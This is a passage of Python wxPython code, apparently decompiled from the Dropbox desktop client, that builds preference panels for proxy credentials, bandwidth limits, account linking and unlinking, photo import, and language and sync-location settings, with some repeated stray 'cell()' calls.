wx.CheckBox(up_self, label=pref_strings.proxy_requires_password_checkbox)\n self.auth_req.Bind(wx.EVT_CHECKBOX, self.handle_auth_checkbox)\n up_sizer.AddSpacer(wx.Size(0, platform.textctrl_textctrl_vertical_spacing))\n cell()\n cell()\n cell()\n cell()\n cell()\n cell()\n cell()\n up_sizer.Add(auth_req, border=platform.checkbox_baseline_adjustment, flag=wx.ALIGN_LEFT | wx.ALIGN_CENTER_VERTICAL | wx.BOTTOM)\n cell()\n up_sizer.AddSpacer(wx.Size(0, platform.textctrl_textctrl_vertical_spacing))\n cell()\n cell()\n cell()\n cell()\n self.ulbl = ulbl = wx.StaticText(up_self, label=pref_strings.proxy_username_label)\n self.user_text = user_text = wx.TextCtrl(up_self, value='', size=wx.Size(platform.username_textctrl_width, -1))\n cell()\n up_sizer.Add(ulbl, border=platform.statictext_baseline_adjustment, flag=wx.ALIGN_BOTTOM | wx.BOTTOM | wx.ALIGN_RIGHT)\n up_sizer.AddSpacer(wx.Size(platform.statictext_textctrl_horizontal_spacing, 0))\n up_sizer.Add(user_text, border=platform.textctrl_baseline_adjustment, flag=wx.ALIGN_BOTTOM | wx.BOTTOM)\n cell()\n self.passlbl = passlbl = wx.StaticText(up_self, label=pref_strings.proxy_password_label)\n self.pass_text = pass_text = wx.TextCtrl(up_self, value='', size=wx.Size(platform.username_textctrl_width, -1), style=wx.TE_PASSWORD)\n up_sizer.AddSpacer(wx.Size(0, platform.textctrl_textctrl_vertical_spacing))\n cell()\n cell()\n cell()\n cell()\n cell()\n up_sizer.Add(passlbl, border=platform.statictext_baseline_adjustment, flag=wx.ALIGN_BOTTOM | wx.BOTTOM | wx.ALIGN_RIGHT)\n up_sizer.AddSpacer(wx.Size(platform.statictext_textctrl_horizontal_spacing, 0))\n up_sizer.Add(pass_text, border=platform.textctrl_baseline_adjustment, flag=wx.ALIGN_BOTTOM | wx.BOTTOM)\n cell()\n up_sizer.AddSpacer(wx.Size(0, platform.swap_panel_border))\n cell()\n cell()\n cell()\n cell()\n the_sizer = pb_sizer if self.has_own_borders else border\n self.Bind(wx.EVT_RADIOBUTTON, self.handle_proxy_choice)\n the_sizer.Add(up_self, proportion=0, flag=wx.RIGHT | wx.LEFT | wx.TOP | wx.EXPAND, border=platform.radio_static_box_interior)\n if self.has_own_borders:\n border.Add(pb_sizer, border=16, flag=wx.BOTTOM | wx.EXPAND)\n self.Bind(wx.EVT_TEXT, self.invalidate)\n self.SetSizer(border)\n self.Layout()\n\n\nclass BandwidthSettingsPanel(DropboxTabPanel):\n\n @staticmethod\n def icon():\n return ui.images.wximages.PrefsBandwidth.GetBitmap()\n\n @staticmethod\n def shortname():\n return pref_strings.bandwidth_tab_label\n\n @staticmethod\n def help_index():\n return 'bandwidth'\n\n @event_handler\n def read(self, state):\n self.upload_rb[state['throttle_upload_style']].SetValue(True)\n self.upload_box.SetValue(state['throttle_upload_speed'])\n if state['throttle_download_style'] == 2:\n self.download_rb[1].SetValue(True)\n else:\n self.download_rb[0].SetValue(True)\n self.download_box.SetValue(state['throttle_download_speed'])\n self.handle_upload_rb(None)\n self.handle_download_rb(None)\n\n @event_handler\n def save(self, theEvent):\n state = {}\n should_raise = False\n if self.download_rb[0].GetValue():\n state['throttle_download_style'] = 0\n else:\n state['throttle_download_style'] = 2\n try:\n state['throttle_download_speed'] = self.download_box.GetValue()\n except TypeBox.EntryErrors:\n should_raise = pref_strings.download_limit_error\n\n if self.upload_rb[0].GetValue():\n state['throttle_upload_style'] = 0\n elif self.upload_rb[1].GetValue():\n state['throttle_upload_style'] = 1\n else:\n state['throttle_upload_style'] = 2\n try:\n state['throttle_upload_speed'] = 
self.upload_box.GetValue()\n except TypeBox.EntryErrors:\n should_raise = pref_strings.upload_limit_error\n\n if should_raise is not False:\n raise InvalidEntryException(self.__class__, should_raise)\n return state\n\n @event_handler\n def handle_download_rb(self, theEvent):\n ability = self.download_rb[1].GetValue()\n self.download_box.Enable(ability)\n self.download_units.Enable(ability)\n self.invalidate(theEvent)\n\n @event_handler\n def handle_upload_rb(self, theEvent):\n ability = self.upload_rb[2].GetValue()\n self.upload_box.Enable(ability)\n self.upload_units.Enable(ability)\n self.invalidate(theEvent)\n\n @event_handler\n def __init__(self, wx_parent, parent, dropbox_app, has_own_borders):\n super(BandwidthSettingsPanel, self).__init__(wx_parent, parent, dropbox_app)\n self.has_own_borders = has_own_borders\n radio_interior = platform.radio_static_box_interior if self.has_own_borders else platform.radio_notebook_interior\n border = self.border = wx.BoxSizer(wx.VERTICAL)\n if self.has_own_borders:\n download_box = wx.StaticBox(self, label=pref_strings.download_label)\n download_sizer = wx.StaticBoxSizer(download_box, wx.VERTICAL)\n TypeBox_t = TypeBox\n else:\n download_sizer = wx.BoxSizer(wx.VERTICAL)\n download_label = wx.StaticText(self, label=pref_strings.download_label)\n font = download_label.GetFont()\n font.SetWeight(wx.FONTWEIGHT_BOLD)\n download_label.SetFont(font)\n download_sizer.Add(download_label, flag=wx.ALIGN_LEFT)\n TypeBox_t = SpinTypeBox\n self.download_rb = [wx.RadioButton(self, label=pref_strings.dont_limit_download, style=wx.RB_GROUP), wx.RadioButton(self, label=pref_strings.speed_limit_download)]\n for rb in self.download_rb:\n self.Bind(wx.EVT_RADIOBUTTON, self.handle_download_rb, rb)\n\n second_row_download_sizer = wx.BoxSizer(wx.HORIZONTAL)\n second_row_download_sizer.Add(self.download_rb[1], border=platform.radio_baseline_adjustment, flag=wx.BOTTOM | wx.ALIGN_BOTTOM | wx.ALIGN_LEFT)\n second_row_download_sizer.AddSpacer(wx.Size(platform.statictext_textctrl_horizontal_spacing, 0))\n self.download_box = TypeBox_t(self, ValidBandwidth, size=wx.Size(50, -1), on_text=[self.invalidate])\n second_row_download_sizer.Add(self.download_box, border=platform.textctrl_baseline_adjustment, flag=wx.BOTTOM | wx.ALIGN_BOTTOM | wx.ALIGN_RIGHT)\n second_row_download_sizer.AddSpacer(wx.Size(platform.textctrl_statictext_horizontal_spacing, 0))\n self.download_units = wx.StaticText(self, label=pref_strings.rate_units)\n second_row_download_sizer.Add(self.download_units, border=platform.statictext_baseline_adjustment, flag=wx.BOTTOM | wx.ALIGN_BOTTOM | wx.ALIGN_RIGHT)\n second_row_download_sizer.AddStretchSpacer()\n download_sizer.Add(self.download_rb[0], flag=wx.ALIGN_LEFT | wx.ALIGN_BOTTOM | wx.LEFT | wx.TOP | wx.RIGHT, border=radio_interior)\n download_sizer.AddSpacer(wx.Size(0, platform.top_of_baselined_textctrl_to_bottom_of_radio))\n download_sizer.Add(second_row_download_sizer, flag=wx.ALIGN_LEFT | wx.ALIGN_BOTTOM | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.BOTTOM, border=radio_interior)\n border.Add(download_sizer, flag=wx.EXPAND | wx.BOTTOM, border=platform.swap_panel_border)\n if self.has_own_borders:\n upload_box = wx.StaticBox(self, label=pref_strings.upload_label)\n upload_sizer = wx.StaticBoxSizer(upload_box, wx.VERTICAL)\n else:\n upload_sizer = wx.BoxSizer(wx.VERTICAL)\n upload_label = wx.StaticText(self, label=pref_strings.upload_label)\n font = upload_label.GetFont()\n font.SetWeight(wx.FONTWEIGHT_BOLD)\n upload_label.SetFont(font)\n upload_sizer.Add(upload_label, 
flag=wx.ALIGN_LEFT)\n self.upload_rb = [wx.RadioButton(self, label=pref_strings.dont_limit_upload, style=wx.RB_GROUP), wx.RadioButton(self, label=pref_strings.auto_limit_upload), wx.RadioButton(self, label=pref_strings.speed_limit_upload)]\n for rb in self.upload_rb:\n self.Bind(wx.EVT_RADIOBUTTON, self.handle_upload_rb, rb)\n\n second_row_upload_sizer = wx.BoxSizer(wx.HORIZONTAL)\n second_row_upload_sizer.Add(self.upload_rb[2], border=platform.radio_baseline_adjustment, flag=wx.BOTTOM | wx.ALIGN_BOTTOM | wx.ALIGN_LEFT)\n second_row_upload_sizer.AddSpacer(wx.Size(platform.statictext_textctrl_horizontal_spacing, 0))\n self.upload_box = TypeBox_t(self, ValidBandwidth, size=wx.Size(50, -1), on_text=[self.invalidate])\n second_row_upload_sizer.Add(self.upload_box, border=platform.textctrl_baseline_adjustment, flag=wx.BOTTOM | wx.ALIGN_BOTTOM | wx.ALIGN_RIGHT)\n second_row_upload_sizer.AddSpacer(wx.Size(platform.textctrl_statictext_horizontal_spacing, 0))\n self.upload_units = wx.StaticText(self, label=pref_strings.rate_units)\n second_row_upload_sizer.Add(self.upload_units, border=platform.statictext_baseline_adjustment, flag=wx.BOTTOM | wx.ALIGN_BOTTOM | wx.ALIGN_RIGHT)\n second_row_upload_sizer.AddStretchSpacer()\n upload_sizer.Add(self.upload_rb[0], flag=wx.ALIGN_LEFT | wx.ALIGN_BOTTOM | wx.LEFT | wx.TOP | wx.RIGHT, border=radio_interior)\n upload_sizer.AddSpacer(wx.Size(0, platform.radio_group_spacer))\n upload_sizer.Add(self.upload_rb[1], flag=wx.ALIGN_LEFT | wx.ALIGN_BOTTOM | wx.LEFT | wx.RIGHT, border=radio_interior)\n upload_sizer.AddSpacer(wx.Size(0, platform.top_of_baselined_textctrl_to_bottom_of_radio))\n upload_sizer.Add(second_row_upload_sizer, flag=wx.ALIGN_LEFT | wx.ALIGN_BOTTOM | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.BOTTOM, border=radio_interior)\n border.Add(upload_sizer, flag=wx.EXPAND | wx.BOTTOM, border=platform.swap_panel_border)\n windows_wx_bug_workaround = wx.RadioButton(self, style=wx.RB_GROUP)\n windows_wx_bug_workaround.Show(False)\n self.SetSizer(border)\n self.Layout()\n self.Bind(wx.EVT_TEXT, self.invalidate)\n\n\n@event_handler\ndef handle_unlink(self, theEvent):\n if self.dropbox_app.sync_engine and self.dropbox_app.sync_engine.status.is_true('importing'):\n wx.MessageDialog(self, pref_strings.unlink_while_importing, caption=pref_strings.unlink_warning_caption, style=wx.OK | wx.ICON_WARNING).ShowModal()\n return\n if 'displayname' in dropbox_globals:\n caption = pref_strings.unlink_dialog_caption_short_with_displayname % dict(displayname=dropbox_globals['displayname'])\n else:\n caption = pref_strings.unlink_dialog_caption_short\n if wx.MessageDialog(self, pref_strings.unlink_dialog_message, caption=caption, style=wx.OK | wx.CANCEL | wx.ICON_QUESTION).ShowModal() == wx.ID_OK:\n self.dropbox_app.restart_and_unlink()\n\n\n@event_handler\ndef handle_link_secondary(self, theEvent):\n self.link_secondary_button.Disable()\n self.dropbox_app.mbox.enable()\n\n\n@event_handler\ndef handle_unlink_secondary(self, theEvent):\n TRACE('!! 
unlinking')\n self.secondary_unlink_button.Disable()\n self.dropbox_app.mbox.unlink_secondary()\n\n\nclass WindowsAccountPanel(DropboxTabPanel):\n\n @staticmethod\n def icon():\n return ui.images.wximages.PrefsAccount.GetBitmap()\n\n @staticmethod\n def shortname():\n return pref_strings.account_tab_label\n\n @staticmethod\n def help_index():\n return 'account'\n\n def read(self, state):\n pass\n\n def save(self, theEvent):\n state = {}\n return state\n\n def set_url_info(self, url_info):\n self.url_info = url_info\n\n @event_handler\n def on_ctrldown(self, *n):\n pass\n\n @message_sender(wx.CallAfter)\n def sync_engine_is_valid(self, sync_engine):\n self.on_show()\n self.parent.resize_for_panel(type(self))\n\n @event_handler\n def on_show(self):\n assert self.dropbox_app.dropbox_url_info is not None, 'this should be set by now'\n if 'displayname' in dropbox_globals:\n self.a_box.SetLabel(pref_strings.account_info_with_displayname % dropbox_globals)\n if 'userdisplayname' in dropbox_globals and self.dropbox_app.dropbox_url_info.email:\n if self.dropbox_app.mbox.enabled:\n emails = self.dropbox_app.mbox.email_addresses\n account_text = pref_strings.multiaccount_linked % dict(user=dropbox_globals['userdisplayname'], personal_email=emails.personal, business_email=emails.business)\n else:\n account_text = pref_strings.account_linked_to_user % dict(user=dropbox_globals['userdisplayname'], email=self.dropbox_app.dropbox_url_info.email)\n self.unlink_button.Enable(True)\n elif self.dropbox_app.dropbox_url_info.email:\n account_text = pref_strings.account_linked_but_not_connected % dict(email=self.dropbox_app.dropbox_url_info.email)\n self.unlink_button.Enable(True)\n else:\n account_text = pref_strings.account_unlinked_display\n self.unlink_button.Enable(False)\n self.account_text.SetLabel(account_text)\n self.account_text.SetSize(wx.Size(100, self.account_text.GetBestSize().GetHeight()))\n self.Layout()\n self.parent.panel.Layout()\n self.account_text.Wrap(self.unlink_sizer.GetSize().GetWidth())\n self.Layout()\n self.parent.panel.Layout()\n\n @message_sender(wx.CallAfter)\n def on_secondary_link(self, linked):\n if self.dropbox_app.mbox.paired:\n primary_label = self.dropbox_app.mbox.unlink_labels.primary\n else:\n primary_label = pref_strings.unlink_button\n self.unlink_button.SetLabel(primary_label)\n self.reset_multiaccount_buttons()\n self.Layout()\n\n @event_handler\n def add_multiaccount_buttons(self):\n self.buttons_vertical_spacer = wx.BoxSizer(wx.VERTICAL)\n self.buttons_vertical_spacer.Add(wx.Size(0, platform.static_box_button_vertical_spacing))\n self.link_secondary_sizer = wx.BoxSizer(wx.HORIZONTAL)\n self.a_sizer.Add(self.buttons_vertical_spacer)\n self.a_sizer.Add(self.link_secondary_sizer, flag=wx.EXPAND)\n self.reset_multiaccount_buttons()\n\n @event_handler\n def reset_multiaccount_buttons(self):\n mbox = self.dropbox_app.mbox\n if not mbox.paired:\n self.a_sizer.Hide(self.buttons_vertical_spacer)\n self.a_sizer.Hide(self.link_secondary_sizer)\n else:\n self.link_secondary_sizer.Clear(True)\n if mbox.enabled:\n secondary_label = mbox.unlink_labels.secondary\n secondary_button = wx.Button(self, label=secondary_label)\n self.secondary_unlink_button = secondary_button\n self.secondary_unlink_button.Bind(wx.EVT_BUTTON, functools.partial(handle_unlink_secondary, self))\n else:\n secondary_label = mbox.link_labels.secondary\n secondary_button = wx.Button(self, label=secondary_label)\n self.link_secondary_button = secondary_button\n self.link_secondary_button.Bind(wx.EVT_BUTTON, 
functools.partial(handle_link_secondary, self))\n self.link_secondary_sizer.AddSpacer(wx.Size(0, 0), proportion=1, flag=wx.EXPAND)\n self.link_secondary_sizer.Add(secondary_button, border=platform.button_baseline_adjustment, flag=wx.ALIGN_BOTTOM | wx.BOTTOM)\n self.a_sizer.Show(self.buttons_vertical_spacer)\n self.a_sizer.Show(self.link_secondary_sizer)\n\n @event_handler\n def __init__(self, wx_parent, parent, dropbox_app, has_own_borders):\n super(WindowsAccountPanel, self).__init__(wx_parent, parent, dropbox_app)\n self.has_own_borders = has_own_borders\n border = self.border = wx.BoxSizer(wx.VERTICAL)\n self.a_box = a_box = wx.StaticBox(self)\n a_boxsizer = wx.StaticBoxSizer(a_box, wx.HORIZONTAL)\n a_sizer = wx.BoxSizer(wx.VERTICAL)\n self.account_text = wx.StaticText(self, label='')\n a_sizer.Add(self.account_text, border=platform.statictext_baseline_adjustment, flag=wx.ALIGN_LEFT | wx.ALIGN_BOTTOM | wx.BOTTOM)\n self.version_text = wx.StaticText(self, label=pref_strings.buildkey_and_version_installed % dict(version_string=VERSION))\n self.version_text.Enable(False)\n a_sizer.Add(self.version_text, border=platform.statictext_baseline_adjustment, flag=wx.ALIGN_BOTTOM | wx.BOTTOM)\n if self.dropbox_app.mbox.paired:\n primary_label = self.dropbox_app.mbox.unlink_labels.primary\n else:\n primary_label = pref_strings.unlink_button\n self.unlink_sizer = unlink_sizer = wx.BoxSizer(wx.HORIZONTAL)\n self.unlink_button = wx.Button(self, label=primary_label)\n self.unlink_button.Bind(wx.EVT_BUTTON, functools.partial(handle_unlink, self))\n unlink_sizer.AddSpacer(wx.Size(0, 0), proportion=1, flag=wx.EXPAND)\n unlink_sizer.Add(self.unlink_button, border=platform.button_baseline_adjustment, flag=wx.ALIGN_BOTTOM | wx.BOTTOM)\n a_sizer.Add(unlink_sizer, flag=wx.EXPAND)\n self.a_sizer = a_sizer\n self.add_multiaccount_buttons()\n a_boxsizer.Add(a_sizer, proportion=1, flag=wx.EXPAND | wx.ALL, border=platform.radio_static_box_interior)\n border.Add(a_boxsizer, proportion=0, flag=wx.EXPAND | wx.BOTTOM, border=platform.swap_panel_border)\n dropbox_app.ui_kit.add_sync_engine_handler(self.sync_engine_is_valid)\n self.SetSizer(border)\n self.Layout()\n\n\nclass LinuxAccountPanel(DropboxTabPanel):\n\n @staticmethod\n def icon():\n return ui.images.wximages.PrefsAccount.GetBitmap()\n\n @staticmethod\n def shortname():\n return pref_strings.account_tab_label\n\n @staticmethod\n def help_index():\n return 'account'\n\n def read(self, state):\n pass\n\n def save(self, theEvent):\n return {}\n\n def set_url_info(self, url_info):\n self.url_info = url_info\n\n @event_handler\n def on_keyup(self, theEvent):\n if theEvent.KeyCode == wx.WXK_CONTROL:\n self.unlink_button.SetLabel(pref_strings.unlink_button)\n self.unlink_fix_perms = False\n theEvent.Skip()\n\n @event_handler\n def disambiguate_unlink(self, theEvent):\n if self.unlink_fix_perms:\n self.fix_permissions(theEvent)\n else:\n handle_unlink(self, theEvent)\n\n def on_ctrldown(self, *n):\n self.unlink_button.SetLabel(pref_strings.unlink_button_fix_perms)\n self.unlink_fix_perms = True\n\n @event_handler\n def fix_permissions(self, theEvent):\n self.unlink_button.SetLabel(pref_strings.unlink_button_fixing_perms)\n self.unlink_button.Enable(False)\n self.throbber.start()\n message_sender(spawn_thread_with_name('FIX_PERMS'), on_success=self.fix_perms_success, on_exception=self.fix_perms_failed, block=False, dont_post=lambda : False)(arch.fixperms.fix_whole_dropbox_permissions)(wx.CallAfter)\n\n @message_sender(wx.CallAfter)\n def fix_perms_success(self, 
failures):\n TRACE('finished fixing permissions')\n self.unlink_button.SetLabel(pref_strings.unlink_button)\n self.unlink_button.Enable(True)\n self.throbber.stop()\n self.throbber.Hide()\n wx.MessageDialog(self, pref_strings.fix_perms_worked_message, caption=pref_strings.fix_perms_worked_caption, style=wx.OK).ShowModal()\n\n @message_sender(wx.CallAfter)\n def fix_perms_failed(self, exc, exc_info):\n TRACE('failed to fix permissions')\n unhandled_exc_handler(exc_info=exc_info)\n self.unlink_button.SetLabel(pref_strings.unlink_button)\n self.unlink_button.Enable(True)\n self.throbber.stop()\n self.throbber.Hide()\n wx.MessageDialog(self, pref_strings.fix_perms_really_bad_error_message, caption=pref_strings.fix_perms_really_bad_error_caption, style=wx.OK | wx.ICON_ERROR).ShowModal()\n\n @message_sender(wx.CallAfter)\n def sync_engine_is_valid(self, sync_engine):\n self.on_show()\n self.parent.resize_for_panel(type(self))\n\n @event_handler\n def on_show(self):\n assert self.url_info is not None, 'this should be set by now'\n unlink_ability = True\n if 'userdisplayname' in dropbox_globals and self.url_info.email:\n account_text_string = u'%s (%s)' % (dropbox_globals['userdisplayname'], self.url_info.email)\n elif self.url_info.email:\n account_text_string = u'%s' % self.url_info.email\n else:\n account_text_string = pref_strings.account_unlinked_display\n unlink_ability = False\n self.unlink_button.Enable(unlink_ability)\n self.unlink_button.Bind(wx.EVT_BUTTON, self.disambiguate_unlink)\n self.unlink_button.SetLabel(pref_strings.unlink_button)\n self.unlink_fix_perms = False\n unlink_button_width = self.unlink_button.GetSize().GetWidth()\n unlink_throbber_width = self.throbber.GetSize().GetWidth()\n unlink_width = unlink_button_width + unlink_throbber_width\n self.account_text.SetLabel(account_text_string)\n self.account_text.SetSize(wx.Size(100, self.account_text.GetBestSize().GetHeight()))\n self.Layout()\n self.account_text.Wrap(self.GetSize().GetWidth() - unlink_width - platform.statictext_notebook_interior * 2)\n self.Layout()\n if not self.unlink_sizer_setup:\n account_text_width = self.account_text.GetSize().GetWidth()\n unlink_border_width = self.GetSize().GetWidth() - account_text_width - unlink_width - platform.statictext_notebook_interior\n self.unlink_sizer.Add(self.unlink_button, border=unlink_border_width, flag=wx.LEFT | wx.ALIGN_CENTER_VERTICAL)\n self.unlink_sizer.Add(self.throbber, flag=wx.ALIGN_CENTER_VERTICAL)\n self.unlink_sizer.Layout()\n self.Layout()\n self.unlink_sizer_setup = True\n\n @event_handler\n def __init__(self, wx_parent, parent, dropbox_app, has_own_borders):\n super(LinuxAccountPanel, self).__init__(wx_parent, parent, dropbox_app)\n self.has_own_borders = has_own_borders\n self.url_info = self.dropbox_app.dropbox_url_info\n inner_border = wx.BoxSizer(wx.VERTICAL)\n version_label = wx.StaticText(self, label=pref_strings.version_label_plain)\n font = version_label.GetFont()\n font.SetWeight(wx.FONTWEIGHT_BOLD)\n version_label.SetFont(font)\n inner_border.Add(version_label, flag=wx.ALIGN_LEFT)\n version_text = wx.StaticText(self, label=pref_strings.buildkey_and_version % dict(version_string=VERSION))\n inner_border.Add(version_text, border=platform.statictext_notebook_interior, flag=wx.ALIGN_LEFT | wx.ALIGN_BOTTOM | wx.ALL)\n account_label = wx.StaticText(self, label=pref_strings.account_label_plain)\n font = account_label.GetFont()\n font.SetWeight(wx.FONTWEIGHT_BOLD)\n account_label.SetFont(font)\n inner_border.Add(account_label, flag=wx.ALIGN_LEFT)\n 
self.account_text = wx.StaticText(self, label=pref_strings.account_unlinked_display)\n self.unlink_button = wx.Button(self, label=pref_strings.unlink_button)\n self.throbber = Throbber(self)\n self.unlink_fix_perms = False\n self.unlink_sizer = wx.BoxSizer(wx.HORIZONTAL)\n self.unlink_sizer.Add(self.account_text, flag=wx.ALIGN_LEFT | wx.ALIGN_CENTER_VERTICAL)\n self.unlink_sizer.Layout()\n self.unlink_sizer_setup = False\n inner_border.Add(self.unlink_sizer, border=platform.statictext_notebook_interior, flag=wx.ALIGN_LEFT | wx.ALIGN_BOTTOM | wx.LEFT | wx.TOP | wx.BOTTOM)\n dropbox_app.ui_kit.add_sync_engine_handler(self.sync_engine_is_valid)\n if feature_enabled('multiaccount'):\n if self.dropbox_app.mbox.enabled:\n self.secondary_account_text = wx.StaticText(self, label=self.dropbox_app.config['secondary_client_email'])\n else:\n self.secondary_account_text = wx.StaticText(self, label=pref_strings.account_unlinked_display)\n self.secondary_action_sizer = wx.BoxSizer(wx.HORIZONTAL)\n self.secondary_action_sizer.Add(self.secondary_account_text, flag=wx.ALIGN_LEFT | wx.ALIGN_CENTER_VERTICAL)\n self.secondary_action_sizer.Layout()\n self.secondary_unlink_sizer_setup = False\n self.link_secondary_sizer = link_secondary_sizer = wx.BoxSizer(wx.HORIZONTAL)\n if self.dropbox_app.mbox.enabled:\n TRACE('!! secondary detected')\n secondary_unlink_label = dropbox_app.mbox.unlink_labels.secondary\n action_button = wx.Button(self, label=secondary_unlink_label)\n self.secondary_unlink_button = action_button\n self.secondary_unlink_button.Bind(wx.EVT_BUTTON, functools.partial(handle_unlink_secondary, self))\n else:\n TRACE('!! secondary not detected')\n secondary_link_label = dropbox_app.mbox.link_labels.secondary\n action_button = self.link_secondary_button = wx.Button(self, label=secondary_link_label)\n self.link_secondary_button.Bind(wx.EVT_BUTTON, functools.partial(handle_link_secondary, self))\n link_secondary_sizer.Add(action_button, border=platform.button_baseline_adjustment, flag=wx.ALIGN_BOTTOM | wx.BOTTOM)\n link_secondary_sizer.AddSpacer(wx.Size(0, 0), proportion=1, flag=wx.EXPAND)\n self.secondary_action_sizer.Add(link_secondary_sizer, flag=wx.ALIGN_RIGHT | wx.ALIGN_CENTER_VERTICAL)\n inner_border.Add(self.secondary_action_sizer)\n self.SetSizer(inner_border)\n self.Layout()\n\n\nif platform.use_notebook:\n AccountPanel = LinuxAccountPanel\nelse:\n AccountPanel = WindowsAccountPanel\n\nclass ImportPanel(DropboxTabPanel):\n\n @staticmethod\n def icon():\n return ui.images.wximages.PrefsImport.GetBitmap()\n\n @staticmethod\n def shortname():\n return pref_strings.import_tab_label\n\n @staticmethod\n def help_index():\n return 'import'\n\n @event_handler\n def read(self, state):\n if self.screenshots_selector:\n self.screenshots_selector.read(state)\n\n @event_handler\n def save(self, theEvent):\n if self.screenshots_selector:\n self.screenshots_selector.save()\n return {}\n\n @event_handler\n def on_show(self):\n self.Layout()\n self.parent.panel.Layout()\n needs_relayout = False\n if self.camera_launcher:\n self.camera_launcher.on_show()\n needs_relayout = True\n if self.photo_import_launcher:\n self.photo_import_launcher.on_show()\n needs_relayout = True\n if self.screenshots_selector and self.screenshots_selector.needs_refresh():\n self.screenshots_selector.on_show()\n needs_relayout = True\n if needs_relayout:\n self.Layout()\n self.parent.panel.Layout()\n self.screenshots_selector.enabled(bool(self.dropbox_app.screenshots_controller))\n\n @event_handler\n def __init__(self, wx_parent, 
parent, dropbox_app, has_own_borders):\n super(ImportPanel, self).__init__(wx_parent, parent, dropbox_app)\n self.has_own_borders = has_own_borders\n self.pref_controller = self.dropbox_app.pref_controller\n self.screenshots_selector = None\n self.camera_launcher = None\n self.photo_import_launcher = None\n self.dropbox_app = dropbox_app\n border = wx.BoxSizer(wx.VERTICAL)\n if feature_enabled('screenshots') and ScreenshotsController.is_supported(self.dropbox_app):\n try:\n self.screenshots_selector = ScreenshotsSelector(self, self.dropbox_app, self.has_own_borders, self.invalidate)\n border.Add(self.screenshots_selector, proportion=0, flag=wx.EXPAND | wx.BOTTOM, border=platform.swap_panel_border)\n except Exception:\n unhandled_exc_handler()\n\n if arch.photouploader.USE_PHOTOUPLOADER:\n try:\n self.camera_launcher = CameraUploadLauncher(self, self.dropbox_app)\n border.Add(self.camera_launcher, proportion=0, flag=wx.EXPAND | wx.BOTTOM, border=platform.swap_panel_border)\n except Exception:\n unhandled_exc_handler()\n\n importer = self.dropbox_app.stuff_importer\n if importer:\n show_pictures, show_documents = importer.show_import_button(self.dropbox_app)\n if show_pictures:\n self.photo_import_launcher = PhotoImportLauncher(self, self.dropbox_app)\n border.Add(self.photo_import_launcher, proportion=0, flag=wx.EXPAND | wx.BOTTOM, border=platform.swap_panel_border)\n self.SetSizerAndFit(border)\n self.Layout()\n\n\nclass AdvancedPanel(DropboxTabPanel):\n\n @staticmethod\n def icon():\n return ui.images.wximages.PrefsAdvanced.GetBitmap()\n\n @staticmethod\n def shortname():\n return pref_strings.advanced_tab_label\n\n @staticmethod\n def help_index():\n return 'advanced'\n\n @event_handler\n def read(self, state):\n self.langchoice.last_selection = self.codes.index(state[OPT_LANG])\n self.langchoice.SetSelection(self.langchoice.last_selection)\n\n @event_handler\n def save(self, theEvent):\n self.langchoice.last_selection = self.langchoice.GetSelection()\n return {OPT_LANG: self.codes[self.langchoice.last_selection]}\n\n @event_handler\n def on_show(self):\n self.Layout()\n self.parent.re_layout()\n\n def Layout(self):\n self.parent.panel.Layout()\n self.selsync_launcher.on_show()\n if self.secondary_selsync_launcher:\n self.secondary_selsync_launcher.on_show()\n super(AdvancedPanel, self).Layout()\n\n @event_handler\n def handle_langchoice(self, theEvent):\n selection = self.langchoice.GetSelection()\n code = self.codes[selection]\n\n def prompt_cb(message, caption = None, on_ok = None, on_cancel = None, ok_button = None, cancel_button = None):\n assert on_ok\n style = wx.OK | wx.CANCEL if on_cancel else wx.OK\n if wx.MessageDialog(self, message, caption, style).ShowModal() == wx.ID_OK:\n on_ok()\n elif on_cancel:\n on_cancel()\n\n def on_restart():\n self.parent.save(theEvent, skip_errors=True)\n\n def on_done():\n self.langchoice.last_selection = selection\n self.langchoice.SetFocus()\n self.invalidate(theEvent, False)\n\n def on_cancel():\n self.langchoice.SetSelection(self.langchoice.last_selection)\n self.langchoice.SetFocus()\n self.invalidate(theEvent, False)\n\n change_client_language(self.dropbox_app, code, prompt_cb, on_done, on_cancel, on_restart)\n\n def add_location_changer(self, secondary = False):\n if self.dropbox_app.mbox.enabled:\n labels = self.dropbox_app.mbox.location_changer_labels\n label = labels.secondary if secondary else labels.primary\n else:\n label = pref_strings.loc_changer_label\n if not self.has_own_borders:\n l_label = wx.StaticText(self, label=label)\n 
l_font = l_label.GetFont()\n l_font.SetWeight(wx.FONTWEIGHT_BOLD)\n l_label.SetFont(l_font)\n self.border.Add(l_label, flag=wx.EXPAND | wx.BOTTOM)\n self.border.AddSpacer(wx.Size(0, platform.textctrl_textctrl_vertical_spacing))\n location_changer = DropboxLocationChanger(self, self.dropbox_app, move=True, has_own_borders=self.has_own_borders, transparent_hack=False, secondary=secondary, label=label)\n self.border.Add(location_changer, proportion=0, flag=wx.EXPAND | wx.BOTTOM, border=platform.swap_panel_border)\n self.border.AddSpacer(wx.Size(0, platform.textctrl_textctrl_vertical_spacing))\n return location_changer\n\n def add_selective_sync_launcher(self, secondary = False):\n if self.dropbox_app.mbox.enabled:\n labels = self.dropbox_app.mbox.selective_sync_labels\n label = labels.secondary if secondary else labels.primary\n else:\n label = selsync_strings.prefs_group_label\n if not self.has_own_borders:\n l_label = wx.StaticText(self, label=label)\n l_font = l_label.GetFont()\n l_font.SetWeight(wx.FONTWEIGHT_BOLD)\n l_label.SetFont(l_font)\n self.border.Add(l_label, flag=wx.EXPAND | wx.BOTTOM)\n selsync_launcher = SelectiveSyncLauncher(self, self.dropbox_app, has_own_borders=self.has_own_borders, transparent_hack=False, secondary=secondary, label=label)\n self.border.Add(selsync_launcher, proportion=0, flag=wx.EXPAND | wx.BOTTOM, border=platform.swap_panel_border)\n self.border.AddSpacer(wx.Size(0, platform.textctrl_textctrl_vertical_spacing))\n return selsync_launcher\n\n @assert_message_queue\n def reset(self):\n if self.border:\n self.border.Clear(True)\n border = self.border = wx.BoxSizer(wx.VERTICAL)\n self.location_changer = self.add_location_changer(secondary=False)\n if self.dropbox_app.mbox.enabled:\n self.secondary_location_changer = self.add_location_changer(secondary=True)\n else:\n self.secondary_location_changer = None\n self.selsync_launcher = self.add_selective_sync_launcher(secondary=False)\n if self.dropbox_app.mbox.enabled:\n self.secondary_selsync_launcher = self.add_selective_sync_launcher(secondary=True)\n else:\n self.secondary_selsync_launcher = None\n self.dropbox_app.ui_kit.add_post_link_handler(self.post_link_handler)\n self.codes = []\n choices = []\n for code, translated, english in dropbox.i18n.get_available_languages():\n self.codes.append(code)\n choices.append('%s [%s]' % (translated, english))\n\n self.langchoice = 